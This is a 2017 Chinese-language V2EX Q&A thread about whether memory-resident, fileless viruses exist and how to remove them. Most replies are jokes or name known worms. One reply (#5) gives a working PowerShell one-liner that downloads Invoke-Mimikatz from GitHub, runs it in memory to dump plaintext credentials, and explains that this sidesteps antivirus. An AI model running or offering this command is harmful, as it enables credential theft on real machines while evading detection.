V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
kiari
V2EX  ›  问与答

弱弱地问下,,有没有人见过内存病毒的?

  •  
  •   kiari · 2017-08-30 17:26:05 +08:00 · 2380 次点击
    这是一个创建于 2646 天前的主题,其中的信息可能已经有所发展或是发生改变。

    不知道有没存在于内存中的病毒,如果有怎么样清楚呢?

    不知道有没有人遇到过?

    9 条回复    2017-08-30 20:17:53 +08:00
    UnisandK
        1
    UnisandK  
       2017-08-30 17:32:11 +08:00
    拔电源
    ZakaryTime
        2
    ZakaryTime  
       2017-08-30 18:11:29 +08:00 via Android
    这种病毒的意义在哪?存活概率为 0
    leloext
        3
    leloext  
       2017-08-30 18:32:56 +08:00
    Worm.NetKiller2003 就是内存病毒,无生成文件。
    ic2y
        4
    ic2y  
       2017-08-30 19:18:36 +08:00   ❤️ 1
    有这种毒。忘记叫什么了。 平时运行在内存,无文件,劫持关机操作,关机前的最后时刻,备份 MBR 引导,写入恶意 MBR,写入恶意程序。一旦开机运行,从 MBR 启动起来之后,立刻恢复正常 MRB,删除恶意程序。。

    巧妙利用关机前,杀毒软件已经退出的间隙。
    anoymoux
        5
    anoymoux  
       2017-08-30 19:30:33 +08:00
    举个例子:Mimikatz 获取明文密码,如果直接下载执行会被杀软删除,用下面的命令就可以在内存中执行,无文件产生
    powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m"
    zenhand
        6
    zenhand  
       2017-08-30 19:39:47 +08:00   ❤️ 1
    @ic2y 一次意外断电就杀毒了。
    claysec
        7
    claysec  
       2017-08-30 19:42:00 +08:00
    把 windows 系统刷进内存你就是无敌的金刚之身了。
    yksoft1
        8
    yksoft1  
       2017-08-30 20:04:08 +08:00
    你说的内存条 SPD 里藏恶意代码,攻击 BIOS/EFI 之类?这个倒真的可以考虑一下。
    一个病毒只存在于 RAM 中也是可以起到攻击作用的,至少完全可以盗取隐私机密数据。
    am241
        9
    am241  
       2017-08-30 20:17:53 +08:00 via Android
    SQL slammer
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3461 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 00:08 · PVG 08:08 · LAX 16:08 · JFK 19:08
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.